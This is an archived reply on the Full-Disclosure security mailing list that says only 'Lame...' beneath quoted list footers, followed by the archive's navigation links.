> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
>
>
> ----------------------------------------------------------------------
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
Lame...
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
[prev in list] [next in list] [prev in thread] [next in thread]
Configure |
About |
News |
Add a list |
Sponsored by KoreLogic